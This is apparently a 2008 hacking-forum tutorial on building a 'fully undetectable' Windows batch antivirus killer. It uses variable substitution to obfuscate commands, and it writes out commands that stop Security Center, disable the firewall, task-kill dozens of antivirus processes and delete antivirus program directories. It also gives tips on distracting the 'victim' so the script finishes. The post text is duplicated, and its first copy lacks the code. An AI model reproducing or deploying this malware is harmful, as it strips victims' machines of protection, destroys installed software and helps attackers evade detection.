06-27-2008, 06:27 AM
Allright. I recieved pm about this so im gonna make a tutorial on it. 0lid0 posted a REALLY LONG AV killer somewheres on the forum (to find search "AV killer") But after a good reading on it i find that it isnt all that good
The things there is wrong or could be better is that it repeats itself randomly so each AV is tskilled 2-5 times in the batch. and the deleter is just duplicated after one another. AND lets not forget that its brilliant UD'ing make it , drums, 33% detectable still!!!. whew.. thats bad. so i will focus on making a much shorter and 100% UD av killer! SO lets get started
Step one:
First of all we need to replace destructive commands by random words. In this case ill be using my name alot =P:
Second step: Disable Firewall!
third step: Task killing AV's
You do this by tskilling the most AV's you know. In my case ive made a list of Possible AV's. But you will see that my list is incomplete. so Add to it, or make a completely new one. NOTE: you can just write the beginning of it and make a *
fourth step: Deleting AV's
You do this by deleting all exe files or all files with any extension in all of the AV directories. If you dont know the full name of the directory you can write some of the name and add "~1" to it. You will find this list incomplete aswell.
When that is done and you have it all in ONE batch you have yourself an 100% UD av-killer!! Nice!
TIPS:
add alot of spamming in the beginning of the batch such as "MSG *" or starting programs. this will stall the victim for the batch to complete without being closed.
A good idea is to add "cls" inbetween each tskill and deletion.. or its gonna look creepy for the victim. And he will close it immediately
EDIT: please take time to answer the above poll!
The things there is wrong or could be better is that it repeats itself randomly so each AV is tskilled 2-5 times in the batch. and the deleter is just duplicated after one another. AND lets not forget that its brilliant UD'ing make it , drums, 33% detectable still!!!. whew.. thats bad. so i will focus on making a much shorter and 100% UD av killer! SO lets get started
Step one:
First of all we need to replace destructive commands by random words. In this case ill be using my name alot =P:
Quote:set fun=netfrom now on i will be using these words in %% instead of the commands
set morefun=stop
set math=tsk
set ias=ill
set mathias=del
set beer=/a
Second step: Disable Firewall!
Quote:%fun% %morefun% “Security Centerâ€
%fun%sh firewall set opmode mode=disable
third step: Task killing AV's
You do this by tskilling the most AV's you know. In my case ive made a list of Possible AV's. But you will see that my list is incomplete. so Add to it, or make a completely new one. NOTE: you can just write the beginning of it and make a *
Quote:%math%%ias% %beer% E-*
%math%%ias% %beer% av*
%math%%ias% %beer% fire*
%math%%ias% %beer% anti*
%math%%ias% %beer% spy*
%math%%ias% %beer% bullguard
%math%%ias% %beer% PersFw
%math%%ias% %beer% KAV*
%math%%ias% %beer% ZONEALARM
%math%%ias% %beer% SAFEWEB
%math%%ias% %beer% OUTPOST
%math%%ias% %beer% nv*
%math%%ias% %beer% nav*
%math%%ias% %beer% F-*
%math%%ias% %beer% ESAFE
%math%%ias% %beer% cle
%math%%ias% %beer% BLACKICE
%math%%ias% %beer% def*
%math%%ias% %beer% kav
%math%%ias% %beer% kav*
%math%%ias% %beer% avg*
%math%%ias% %beer% ash*
%math%%ias% %beer% aswupdsv
%math%%ias% %beer% ewid*
%math%%ias% %beer% guard*
%math%%ias% %beer% guar*
%math%%ias% %beer% gcasDt*
%math%%ias% %beer% msmp*
%math%%ias% %beer% mcafe*
%math%%ias% %beer% mghtml
%math%%ias% %beer% msiexec
%math%%ias% %beer% outpost
%math%%ias% %beer% isafe
%math%%ias% %beer% zap*
%math%%ias% %beer% zauinst
%math%%ias% %beer% upd*
%math%%ias% %beer% zlclien*
%math%%ias% %beer% minilog
%math%%ias% %beer% cc*
%math%%ias% %beer% norton*
%math%%ias% %beer% norton au*
%math%%ias% %beer% ccc*
%math%%ias% %beer% npfmn*
%math%%ias% %beer% loge*
%math%%ias% %beer% nisum*
%math%%ias% %beer% issvc
%math%%ias% %beer% tmp*
%math%%ias% %beer% tmn*
%math%%ias% %beer% pcc*
%math%%ias% %beer% cpd*
%math%%ias% %beer% pop*
%math%%ias% %beer% pav*
%math%%ias% %beer% padmin
%math%%ias% %beer% panda*
%math%%ias% %beer% avsch*
%math%%ias% %beer% sche*
%math%%ias% %beer% syman*
%math%%ias% %beer% virus*
%math%%ias% %beer% realm*
%math%%ias% %beer% sweep*
%math%%ias% %beer% scan*
%math%%ias% %beer% ad-*
%math%%ias% %beer% safe*
%math%%ias% %beer% avas*
%math%%ias% %beer% norm*
%math%%ias% %beer% offg*
fourth step: Deleting AV's
You do this by deleting all exe files or all files with any extension in all of the AV directories. If you dont know the full name of the directory you can write some of the name and add "~1" to it. You will find this list incomplete aswell.
Quote:%mathias% /Q /F %ProgramFiles%\alwils~1\avast4\*.*
%mathias% /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe
%mathias% /Q /F %ProgramFiles%\kasper~1\*.exe
%mathias% /Q /F %ProgramFiles%\trojan~1\*.exe
%mathias% /Q /F %ProgramFiles%\f-prot95\*.*
%mathias% /Q /F %ProgramFiles%\tbav\*.dat
%mathias% /Q /F %ProgramFiles%\avpersonal\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
%mathias% /Q /F %ProgramFiles%\Mcafee\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
%mathias% /Q /F %ProgramFiles%\avgamsr\*.exe
%mathias% /Q /F %ProgramFiles%\avgamsvr\*.exe
%mathias% /Q /F %ProgramFiles%\avgemc\*.exe
%mathias% /Q /F %ProgramFiles%\avgcc\*.exe
%mathias% /Q /F %ProgramFiles%\avgupsvc\*.exe
%mathias% /Q /F %ProgramFiles%\grisoft
%mathias% /Q /F %ProgramFiles%\nood32krn\*.exe
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
%mathias% /Q /F %ProgramFiles%\nod32\*.exe
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
%mathias% /Q /F %ProgramFiles%\kav\*.exe
%mathias% /Q /F %ProgramFiles%\kavmm\*.exe
%mathias% /Q /F %ProgramFiles%\kaspersky\*.*
%mathias% /Q /F %ProgramFiles%\ewidoctrl\*.exe
%mathias% /Q /F %ProgramFiles%\guard\*.exe
%mathias% /Q /F %ProgramFiles%\ewido\*.exe
%mathias% /Q /F %ProgramFiles%\pavprsrv\*.exe
%mathias% /Q /F %ProgramFiles%\pavprot\*.exe
%mathias% /Q /F %ProgramFiles%\avengine\*.exe
%mathias% /Q /F %ProgramFiles%\apvxdwin\*.exe
%mathias% /Q /F %ProgramFiles%\webproxy\*.exe
%mathias% /Q /F %ProgramFiles%\panda software\*.*
When that is done and you have it all in ONE batch you have yourself an 100% UD av-killer!! Nice!
TIPS:
add alot of spamming in the beginning of the batch such as "MSG *" or starting programs. this will stall the victim for the batch to complete without being closed.
A good idea is to add "cls" inbetween each tskill and deletion.. or its gonna look creepy for the victim. And he will close it immediately
EDIT: please take time to answer the above poll!
